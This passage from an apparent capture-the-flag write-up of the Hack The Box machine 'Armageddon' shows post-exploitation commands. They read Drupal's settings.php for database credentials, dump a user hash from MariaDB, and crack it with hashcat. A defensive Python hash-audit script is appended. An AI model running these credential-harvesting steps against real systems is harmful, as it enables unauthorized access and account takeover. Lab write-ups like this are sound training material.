DB


I have confirmed that the 127.0.0.1:3306 socket is up and listening. That’s likely the mysqld process.

Drupal usually stores DB credentials in the sites/default/settings.php file.

sh-4.2$ ll sites/default
total 56K
  0 drwxrwxr-x. 3 apache apache  37 Dec  3  2020 files
28K -r--r--r--. 1 apache apache 26K Dec  3  2020 settings.php
  0 dr-xr-xr-x. 3 apache apache  67 Dec  3  2020 .
  0 drwxr-xr-x. 4 apache apache  75 Jun 21  2017 ..
28K -rw-r--r--. 1 apache apache 26K Jun 21  2017 default.settings.php

Checking the sites/default directory indeed reveals the settings.php file.

sh-4.2$ cat sites/default/settings.php
<?php
 
[...REDACTED...]
 
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
 
[...REDACTED...]

DB credential found: drupaluser:CQHEy@9M*m23gBVj. Before checking for password reuse, I will look at the DB itself first.

sh-4.2$ mysql -udrupaluser -p
enter password: CQHEy@9M*m23gBVj

It doesn’t seem like I am able to connect to the mysqld instance running on the 127.0.0.1:3306 socket. It just hangs.

brucetherealadmin


[brucetherealadmin@armageddon ~]$ mysql -udrupaluser -pCQHEy@9M*m23gBVj
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 287
Server version: 5.5.68-MariaDB MariaDB Server
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]>

I was able to connect to the mysqld instance after making a lateral movement to the brucetherealadmin user via SSH. The fact that I was not able to connect to the mysqld instance before suggests that the earlier attempt failed for 2 possible reasons:

  1. The PHP reverse shell session wasn’t stable enough to get into another mysql CLI session
  2. The apache user did not have enough privileges

Nevertheless, I will continue the enumeration.

DB


MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupal             |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.01 sec)
 
MariaDB [(none)]> use drupal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed

I will be checking the drupal DB.

drupal.users


MariaDB [drupal]> select name,pass from users;
+-------------------+---------------------------------------------------------+
| name              | pass                                                    |
+-------------------+---------------------------------------------------------+
|                   |                                                         |
| brucetherealadmin | $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt |
+-------------------+---------------------------------------------------------+
2 rows in set (0.00 sec)

Checking the drupal.users table reveals the web credential of the brucetherealadmin user.

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ hashcat -a 0 -m 7900 brucetherealadmin.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
minimum password length supported by kernel: 0
maximum password length supported by kernel: 256
 
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
 
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
 
$s$dgl2gjv6ztxbo6cdqzeyjubphbmrcqiv6w97.oosuf1xahaadurt:booboo
 
session..........: hashcat
status...........: Cracked
hash.mode........: 7900 (Drupal7)
hash.target......: $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
time.started.....: Mon Apr  3 20:57:24 2023 (2 secs)
time.estimated...: Mon Apr  3 20:57:26 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........:      220 H/s (13.46ms) @ Accel:32 Loops:1024 Thr:1 Vec:4
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 288/14344385 (0.00%)
rejected.........: 0/288 (0.00%)
restore.point....: 192/14344385 (0.00%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:31744-32768
candidate.engine.: Device Generator
candidates.#1....: alyssa -> brenda
hardware.mon.#1..: Util: 88%
 
started: Mon Apr  3 20:57:22 2023
stopped: Mon Apr  3 20:57:27 2023

Cracking the password hash confirms password reuse on the credential: brucetherealadmin:booboo
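From the defender's side, the same `$S$` hash format can be audited before an attacker gets to it. The following is an added example, not part of the original write-up: it decodes the iteration count and salt from the Drupal 7 hash shown above (salted SHA-512 iterated 2^n times) and flags accounts whose stored hash matches a denylisted password. The function names and the denylist are assumptions made for the demo; the hash row is the one from the `users` query above.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55  # Drupal 7 truncates stored hashes to 55 characters

def parse_setting(stored):
    """Split a Drupal 7 '$S$' hash into (iterations, salt)."""
    if not stored.startswith("$S$") or len(stored) != HASH_LENGTH:
        raise ValueError("not a Drupal 7 SHA-512 hash")
    count_log2 = ITOA64.index(stored[3])  # 4th character encodes log2(iterations)
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    return 1 << count_log2, stored[4:12]

def _b64(data):
    """phpass-style base64: 3 bytes little-endian -> 4 chars, low bits first."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        v = int.from_bytes(chunk, "little")
        for _ in range(len(chunk) + 1):
            out.append(ITOA64[v & 0x3F])
            v >>= 6
    return "".join(out)

def check_password(password, stored):
    """Recompute the hash the way Drupal 7 does and compare in constant time."""
    iterations, salt = parse_setting(stored)
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(iterations):
        digest = hashlib.sha512(digest + pw).digest()
    candidate = (stored[:12] + _b64(digest))[:HASH_LENGTH]
    return hmac.compare_digest(candidate, stored)

def audit(users, denylist):
    """Return account names whose stored hash matches a denylisted password."""
    return [name for name, stored in users
            if any(check_password(p, stored) for p in denylist)]

# Row from the drupal.users query above; the denylist is constructed for the demo.
USERS = [("brucetherealadmin",
          "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt")]
DENYLIST = ["password", "123456", "booboo"]

if __name__ == "__main__":
    print(parse_setting(USERS[0][1]))   # iteration count and salt
    print(audit(USERS, DENYLIST))       # accounts using a denylisted password
```

The decoded iteration count matches the `Iteration:31744-32768` range in the hashcat output: the stretching slowed guessing to 220 H/s, but the password sat within the first few hundred wordlist entries, so the cost factor could not compensate.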